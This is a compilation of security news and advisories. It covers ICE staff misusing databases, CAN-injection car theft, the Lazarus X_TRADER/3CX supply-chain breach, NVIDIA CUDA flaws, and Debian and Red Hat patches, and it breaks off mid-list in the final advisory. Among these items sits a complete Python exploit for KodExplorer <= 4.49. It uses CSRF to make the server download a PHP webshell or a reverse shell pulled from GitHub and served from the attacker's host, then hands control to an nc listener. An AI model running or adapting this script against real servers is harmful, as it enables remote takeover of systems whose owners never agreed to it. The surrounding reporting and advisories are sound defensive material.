Apple thwarts NSO’s spyware, the rise of a GPT-4 black market, Russia targets Starlink internet connections, and more.

Employees of the US Immigration and Customs Enforcement agency (ICE) abused law enforcement databases to snoop on their romantic partners, neighbors, and business associates, WIRED exclusively revealed this week. New data obtained through record requests show that hundreds of ICE staffers and contractors have faced investigations since 2016 for attempting to access medical, biometric, and location data without permission. The revelations raise further questions about the protections ICE places on people’s sensitive information.

Security researchers at ESET found old enterprise routers are filled with company secrets. After purchasing and analyzing old routers, the firm found many contained login details for company VPNs, hashed root administrator passwords, and details of who the previous owners were. The information would make it easy to impersonate the business that owned the router originally. Sticking with account security: The race to replace all your passwords with passkeys is entering a messy new phase. Adoption of the new technology faces challenges getting off the ground.

The supply chain breach of 3CX, a VoIP provider that was compromised by North Korean hackers, is coming into focus, and the attack appears to be more complex than initially believed. Google-owned security firm Mandiant said 3CX was initially compromised by a supply chain attack before its software was used to further spread malware.

Also this week, it emerged that the notorious LockBit ransomware gang is developing malware that aims to encrypt Macs. To date, most ransomware has focused on machines running Windows or Linux, not devices made by Apple. If LockBit is successful, it could open up a new ransomware frontier—however, at the moment, the ransomware doesn’t appear to work.

With the rise of generative AI models, like ChatGPT and Midjourney, we’ve also looked at how you can guard against AI-powered scams. And a hacker who compromised the Twitter account of right-wing commentator Matt Walsh said they did so because they were “bored.”

But that’s not all. Each week, we round up the stories we didn’t report in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Car thieves are using a series of small hacking tools—sometimes hidden in Nokia 3310 phones or Bluetooth speakers—to break into and steal vehicles. This week, a report from Motherboard detailed how criminals are using controller area network (CAN) injection attacks to steal cars without having access to their keys. Security researchers say criminals first have to detach a car's headlights and then connect the hacking tool with two cables. Once connected, it can send fake messages to the car that look like they are originating from the car's wireless keys, and allow it to be unlocked and started.

Motherboard reports the hacking devices are being sold online and in Telegram channels for between $2,700 and $19,600, a potentially small price when trying to steal luxury cars. Security researchers at Canis Labs first detailed the issue after one car was stolen using the technique. Advertisements claim the tools can work on vehicles made by Toyota, BMW, and Lexus. The security researchers say encrypting traffic sent in CAN messages would help to stop the attacks.

In recent years, NSO Group’s Pegasus spyware has been used to target political leaders, activists, and journalists around the world, with experts describing the technology as being as powerful as the capabilities of the most elite hackers. In response to the sophisticated spyware, Apple released Lockdown Mode last year, which adds extra security protections to iPhones and limits how successful spyware could be. Now, new research from the University of Toronto’s Citizen Lab has found that Apple’s security measures are working. Cases reviewed by Citizen Lab showed that iPhones running Lockdown Mode have blocked hacking attempts linked to NSO’s software and sent notifications to the phones’ owners. The research found three new “zero-click” exploits that could impact iOS 15 and iOS 16, which had been targeted at members of Mexico’s civil society. Lockdown mode detected one of these attacks in real time.

Since OpenAI released GPT-4 in March, people have clamored to get their hands on the text-generating system. This, perhaps unsurprisingly, includes cybercriminals. Analysts at security firm Check Point have discovered a burgeoning market for the sale of login details for GPT-4. The company says that since the start of March, it has seen an “increase in discussion and trade of stolen ChatGPT accounts.” This includes criminals swapping premium ChatGPT accounts and brute-forcing their way into accounts by guessing email logins and passwords. The efforts could in theory help people in Russia, Iran, and China to access OpenAI’s system, which is currently blocked in those nations.

Russia has been trying to control Ukraine's internet access and media since Vladimir Putin launched his full-scale invasion in February 2022. Sensitive US documents leaked on Discord now show that Russian forces have been experimenting with an electronic warfare system, called Tobol, to disrupt internet connections from Elon Musk's Starlink satellite system. According to the _The Washington Post_, the Russian Tobol system appears to be more advanced than previously thought, although it is not clear if it has actually disrupted internet connections. Analysts initially believed Tobol was designed for defensive purposes but have since concluded it could also be used for offensive purposes, disrupting signals as they are sent from the ground to satellites orbiting the Earth.

For the last four years, politicians in the UK have been drafting laws designed to regulate the internet—first in the guise of an online harms law, which has since morphed into the Online Safety Bill. It's been a particularly messy process—often trying to deal with a dizzying range of online activities—but its impact on end-to-end encryption is alarming technology firms. This week, WhatsApp, Signal, and the companies behind five other encrypted chat apps signed an open letter saying the UK’s plans could effectively ban encryption, which keeps billions of people's conversations private and secure. (Only the sender and receiver can view end-to-end encrypted messages; the companies that own the messengers don't have access). “The Bill poses an unprecedented threat to the privacy, safety and security of every UK citizen and the people with whom they communicate around the world, while emboldening hostile governments who may seek to draft copy-cat laws,” the companies say in the letter.

Criminals Are Using Tiny Devices to Hack and Steal Cars

Lazarus, the prolific North Korean hacking group behind the cascading supply chain attack targeting 3CX, also breached two critical infrastructure organizations in the power and energy sector and two other businesses involved in financial trading using the trojanized X_TRADER application.
The new findings, which come courtesy of Symantec's Threat Hunter Team, confirm earlier suspicions that the

Supply Chain / Cyber Threat

Lazarus, the prolific North Korean hacking group behind the cascading supply chain attack targeting 3CX, also breached two critical infrastructure organizations in the power and energy sector and two other businesses involved in financial trading using the trojanized X\_TRADER application.

The new findings, which come courtesy of Symantec's Threat Hunter Team, confirm earlier suspicions that the X\_TRADER application compromise affected more organizations than 3CX. The names of the organizations were not revealed.

Eric Chien, director of security response at Broadcom-owned Symantec, told The Hacker News in a statement that the attacks took place between September 2022 and November 2022.

"The impact from these infections is unknown at this time – more investigation is required and is on-going," Chien said, adding it's possible that there's "likely more to this story and possibly even other packages that are trojanized."

The development comes as Mandiant disclosed that the compromise of the 3CX desktop application software last month was facilitated by another software supply chain breach targeting X\_TRADER in 2022, which an employee downloaded to their personal computer.

It's currently unclear how UNC4736, a North Korean nexus actor, tampered with X\_TRADER, a piece of trading software developed by a company named Trading Technologies. While the service was discontinued in April 2020, it was still available for download on the company's website as recently as last year.

Mandiant's investigation has revealed that the backdoor (dubbed VEILEDSIGNAL) injected into the corrupted X\_TRADER app allowed the adversary to gain access to the employee's computer and siphon their credentials, which were then used it to breach 3CX's network, move laterally, and compromise the Windows and macOS build environments to insert malicious code.

The sprawling interlinked attack appears to have substantial overlap with previous North Korea-aligned groups and campaigns that have historically targeted cryptocurrency companies and conducted financially motivated attacks.

The Google Cloud subsidiary has assessed with "moderate confidence" that the activity is linked to AppleJeus, a persistent campaign targeting crypto companies for financial theft. Cybersecurity firm CrowdStrike previously attributed the attack to a Lazarus cluster it calls Labyrinth Chollima.

The same adversarial collective was previously linked by Google's Threat Analysis Group (TAG) to the compromise of Trading Technologies' website in February 2022 to serve an exploit kit that leveraged a then zero-day flaw in the Chrome web browser.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

ESET, in an analysis of a disparate Lazarus Group campaign, disclosed a new piece of Linux-based malware called SimplexTea that shares the same network infrastructure identified as used by UNC4736, further expanding on existing evidence that the 3CX hack was orchestrated by North Korean threat actors.

"\[Mandiant's\] finding about a second supply-chain attack responsible for the compromise of 3CX is a revelation that Lazarus could be shifting more and more to this technique to get initial access in their targets' network," ESET malware researcher Marc-Etienne M.Léveillé told The Hacker News.

The compromise of the X\_TRADER application further alludes to the attackers' financial motivations. Lazarus (also known as HIDDEN COBRA) is an umbrella term for a composite of several subgroups based in North Korea that engage in both espionage and cybercriminal activities on behalf of the Hermit Kingdom and evade international sanctions.

Symantec's breakdown of the infection chain corroborates the deployment of the VEILEDSIGNAL modular backdoor, which also incorporates a process-injection module that can be injected into Chrome, Firefox, or Edge web browsers. The module, for its part, contains a dynamic-link library (DLL) that connects to the Trading Technologies' website for command-and-control (C2).

"The discovery that 3CX was breached by another, earlier supply chain attack made it highly likely that further organizations would be impacted by this campaign, which now transpires to be far more wide-ranging than originally believed," Symantec concluded.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Lazarus X_TRADER Hack Impacts Critical Infrastructure Beyond 3CX Breach

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in cuobjdump, where an attacker may cause an out-of-bounds read by tricking a user into running cuobjdump on a malformed input file. A successful exploit of this vulnerability may lead to limited denial of service, code execution, and limited information disclosure.

**Details**

This section summarizes the potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors follow CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector and CWE**

CVE‑2023‑25512

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in cuobjdump, where an attacker may cause an out-of-bounds memory read by running cuobjdump on a malformed input file. A successful exploit of this vulnerability may lead to limited denial of service, code execution, and limited information disclosure.

5.3

AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L  
CWE‑125

CVE‑2023‑25513

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in cuobjdump, where an attacker may cause an out-of-bounds read by tricking a user into running cuobjdump on a malformed input file. A successful exploit of this vulnerability may lead to limited denial of service, code execution, and limited information disclosure.

5.3

AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L  
CWE‑125

CVE‑2023‑25514

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in cuobjdump, where an attacker may cause an out-of-bounds read by tricking a user into running cuobjdump on a malformed input file. A successful exploit of this vulnerability may lead to limited denial of service, code execution, and limited information disclosure.

5.3

AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L  
CWE‑125

CVE‑2023‑25510

NVIDIA CUDA Toolkit SDK for Linux and Windows contains a NULL pointer dereference in cuobjdump, where a local user running the tool against a malformed binary may cause a limited denial of service.

3.3

AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L  
CWE‑476

CVE‑2023‑25511

NVIDIA CUDA Toolkit for Linux and Windows contains a vulnerability in cuobjdump, where a division-by-zero error may enable a user to cause a crash, which may lead to a limited denial of service.

3.3

AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L  
CWE‑369

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Updates**

The following table lists the software products and versions affected, and the updated version available from nvidia.com that includes this security update.

Download the update from the CUDA Toolkit Downloads page to apply the security update.

**CVEs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

CVE‑2023‑25510  
CVE‑2023‑25511  
CVE‑2023‑25514

NVIDIA CUDA Toolkit

Linux, Windows

All versions prior to 12.1 Update 1

12.1 Update 1

CVE‑2023‑25512

NVIDIA CUDA Toolkit

Linux, Windows

All versions prior to 12.1

12.1

CVE‑2023‑25513

NVIDIA CUDA Toolkit

Linux, Windows

All versions prior to 12.0 Update 1

12.0 Update 1

**Notes**

*   Earlier software releases of this product are also affected. If you are using an earlier release, upgrade to the latest release version.

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

*   CVE‑2023‑25510, CVE‑2023‑25511: zz zr, Zhaozixi105
*   CVE‑2023‑25512: Luca Di Bartolomeo @ EPFL, Zhaozixi105
*   CVE‑2023‑25513: Luca Di Bartolomeo @ EPFL

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

April 21, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25514: NVIDIA Support

Debian Linux Security Advisory 5391-1 - Several vulnerabilities were discovered in libxml2, a library providing support to read, modify and write XML and HTML files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5391-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 20, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libxml2CVE ID         : CVE-2023-28484 CVE-2023-29469Debian Bug     : 1034436 1034437Several vulnerabilities were discovered in libxml2, a library providingsupport to read, modify and write XML and HTML files.CVE-2023-28484    A NULL pointer dereference flaw when parsing invalid XML schemas may    result in denial of service.CVE-2023-29469    It was reported that when hashing empty strings which aren't    null-terminated, xmlDictComputeFastKey could produce inconsistent    results, which may lead to various logic or memory errors.For the stable distribution (bullseye), these problems have been fixed inversion 2.9.10+dfsg-6.7+deb11u4.We recommend that you upgrade your libxml2 packages.For the detailed security status of libxml2 please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libxml2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRBo8BfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SJJg//UIK3AxfSJq/tbbIu1hav33WMU6LMM0Jg/eEFB6gY4NFM45GMFn4UuSVbuenD4Nx5CyRnahhypbxzZdsVO9DjrAGjBpoyjlOHNQPddHRYbujZU0gVHwfam50fKJjdnkzFwsxkTOwF0UloNwqAvBUp2LG5Eqjz1CPvcbAAyRYIyyYdj3uLRuz/Zv8J6z/nvDndCsN4RWqioGvaH084Y0QsmkGV7devmEDZ9ybiiGBQ4Dq3H2aTMYwx63McN7kbcGEZiuBT4S5fZXzmlH5lEKjlSbOzhqXyL4UxnrXs7RaAc+qqamokTKyy2hzfaW7zoEPymSl7Zoix3r8BR4GZs6HlPUhwOdnuRhqqOzF1Q2qmefj5GtlmuhtSmZKan8AdLuFEp42Rxii6u8UJZ7RS3lqH70RgMgBKtjLD4TX6RpisSwGzrjKh7AonFLPFeaEXbABD8/wTePQCbzYNn8xWgkT8A4a3PRnQEwFJO51ajhx772O9XepqSh46INnxraxFAyOPveHXfi+6msmP7gf5TxNa9FA69eQOoyZJpMxlm8u4DvPNPN75TdA4alMDg5l41yCec745vFt1lhBHki//CTey7NCi5ElqBKlvoQV7SgIUeHW5U6TWDgWTTfZN69MWFk14M7ddEP+0cckyTcHun2vid7dm84iEwwbg0dMHcmpDV1Y==btNX-----END PGP SIGNATURE-----

Debian Security Advisory 5391-1

Red Hat Security Advisory 2023-1923-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1923-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1923  
Issue date:        2023-04-21  
CVE Names:         CVE-2023-0461   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kpatch-patch-4_18_0-372_32_1-1-6.el8_6.src.rpm  
kpatch-patch-4_18_0-372_36_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_40_1-1-5.el8_6.src.rpm  
kpatch-patch-4_18_0-372_41_1-1-4.el8_6.src.rpm  
kpatch-patch-4_18_0-372_46_1-1-2.el8_6.src.rpm  
kpatch-patch-4_18_0-372_51_1-1-1.el8_6.src.rpm

ppc64le:  
kpatch-patch-4_18_0-372_32_1-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-6.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-5.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-4.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_51_1-debugsource-1-1.el8_6.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-372_32_1-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debuginfo-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_32_1-debugsource-1-6.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_36_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debuginfo-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_40_1-debugsource-1-5.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debuginfo-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_41_1-debugsource-1-4.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debuginfo-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_46_1-debugsource-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_51_1-debugsource-1-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEJJZtzjgjWX9erEAQianQ//YnUy8jpbaXCIAc0ZNC8qP+4DbFC16ebN  
/wPX7q5UCNvKnqR3DS10iWiQYnlkhu15bqryeHlVwMSrEo67Cac9orbXLD1Oxjzs  
CX+zyk3I7+gvPyA7Wu7t6E+WgsVLtHvWcKk1PsdhCSQ2ms+3rl6jKgWiaoWNr7UB  
+5+/oEPkekHhrf5loIWZ6hK9S6sEmDThwXLja1Mb03eKUk3yenYZOo30lXsR2zyC  
fuNQxDOb4vFPMAr3BJ/vn6egIHzbg5TYMG1XFvDahdh7xBj7yMSnosZPPLIk/Sf6  
iw+ZUVsLFTvrJh0vbwXe+IPYU2khWg5p5fXYQlIxTG5QzZ1sVlq4w4MsqiOmGJzf  
/jibzeDAPBcmDcMQRUguOi3xw5A91p9PeJkq0gP9rvfsSugfiCiwDCgerBXSY7mk  
sNmCapqk8rU7PMTATleN94KejWn5A62NC4j4lHgYtj+dDXdbFK4DAIF6CBQ6+kKR  
6UuTZL4Uo0hOTCN+3zT9627xpDk4vChsQn/Sj4KQZzaU8lfQ5vVftzyLBokLdIJW  
80X+4I8bIJ43o2thq1Y+nkii7X+8+lFQ9ZSJ4oChXx/JQ9WIMaZYg62q3TGeX+8T  
cL35F8UD51zKGei80bExQyqAGlbQ2ORBGWl9uzJBMR5WyI2VObqALvzJvMIwovKp  
Urd/U30SCqk=  
=aXJP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1923-01

KODExplorer versions 4.49 and below suffer from cross site request forgery and remote shell upload vulnerabilities.

    # Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload# Date: 21/04/2023# Exploit Author: Mr Empy# Software Link: https://github.com/kalcaddle/KodExplorer# Version: <= 4.49# Tested on: Linux# References:# * https://vuldb.com/?id.227000# * https://www.cve.org/CVERecord?id=CVE-2022-4944# * https://github.com/MrEmpy/CVE-2022-4944import argparseimport http.serverimport socketserverimport osimport threadingimport requestsfrom time import sleepdef banner():    print(''' _   _____________ _____           _                      ______  _____ _____| | / /  _  |  _  \  ___|         | |                     | ___ \/  __ \| ___|| |/ /| | | | | | | |____  ___ __ | | ___  _ __ ___ _ __  | |_/ /| /  \/||__|    \| | | | | | |  __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| |    / | |    | __|| |\  \ \_/ / |/ /| |___>  <| |_) | | (_) | | |  __/ |    | |\ \ | \__/\||___\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_|  \___|_|    \_| \_|\____/\____/                            | |                            |_|                [KODExplorer <= v4.49 Remote Code Executon]                           [Coded by MrEmpy]''')def httpd():    port = 8080    httpddir = os.path.join(os.path.dirname(__file__), 'http')    os.chdir(httpddir)    Handler = http.server.SimpleHTTPRequestHandler    httpd = socketserver.TCPServer(('', port), Handler)    print('[+] HTTP Server started')    httpd.serve_forever()def webshell(url, lhost):    payload = '<pre><?php system($_GET["cmd"])?></pre>'    path = '/data/User/admin/home/'    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')    wshell_f = open('http/shell.php', 'w')    wshell_f.write(payload)    wshell_f.close()    print('[*] Opening HTTPd port')    th = threading.Thread(target=httpd)    th.start()    print(f'[+] Send this URI to your target:{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://{lhost}:8080/shell.php&uuid=&time=')    print(f'[+] After the victim opens the URI, his shell will be hosted at{url}/data/User/admin/home/shell.php?cmd=whoami')def reverseshell(url, lhost):    rvpayload = 'https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php'    path = '/data/User/admin/home/'    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')    lport = input('[*] Your local port: ')    reqpayload = requests.get(rvpayload).text    reqpayload = reqpayload.replace('127.0.0.1', lhost)    reqpayload = reqpayload.replace('1234', lport)    wshell_f = open('http/shell.php', 'w')    wshell_f.write(reqpayload)    wshell_f.close()    print('[*] Opening HTTPd port')    th = threading.Thread(target=httpd)    th.start()    print(f'[+] Send this URI to your target:{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://{lhost}:8080/shell.php&uuid=&time=')    input(f'[*] Run the command "nc -lnvp {lport}" to receive theconnection and press any key\n')    while True:        hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')        sleep(1)        if not hitshell.status_code == 200:            continue        else:            print('[+] Shell sent and executed!')            breakdef main(url, lhost, mode):    banner()    if mode == 'webshell':        webshell(url, lhost)    elif mode == 'reverse':        reverseshell(url, lhost)    else:        print('[-] There is no such mode. Use webshell or reverse')if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-u','--url', action='store', help='target url',dest='url', required=True)    parser.add_argument('-lh','--local-host', action='store', help='localhost', dest='lhost', required=True)    parser.add_argument('-m','--mode', action='store', help='mode(webshell, reverse)', dest='mode', required=True)    arguments = parser.parse_args()    main(arguments.url, arguments.lhost, arguments.mode)

KODExplorer 4.49 Cross Site Request Forgery / Shell Upload

Red Hat Security Advisory 2023-1919-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:1919-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1919  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28205   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* WebKitGTK: use-after-free leads to arbitrary code execution  
(CVE-2023-28205)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2185724 - CVE-2023-28205 WebKitGTK: use-after-free leads to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.36.7-1.el8_7.3.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.s390x.rpm

x86_64:  
